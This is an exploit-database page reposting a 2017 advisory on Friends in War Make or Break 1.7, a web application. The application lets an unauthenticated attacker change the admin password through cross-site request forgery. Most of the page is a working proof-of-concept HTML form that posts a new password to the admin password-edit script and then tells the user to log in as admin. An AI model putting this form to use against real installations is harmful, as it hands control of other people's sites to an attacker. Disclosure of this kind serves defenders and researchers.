Advertisement






Friends in War Make or Break 1.7 Cross-Site Request Forgery

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017070183

Below is a copy:

Friends in War Make or Break 1.7 Cross-Site Request ForgeryFriends in War Make or Break 1.7 - Unauthenticated admin password change

Url: http://software.friendsinwar.com/
     http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------

PROOF OF CONCEPT:
<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
<label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
<input type="text" name="password" value="ChangeMe">
<input type="text" name="submit" value="Edit+Password" hidden=true>
<input type="submit" value="Submit">
</form>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum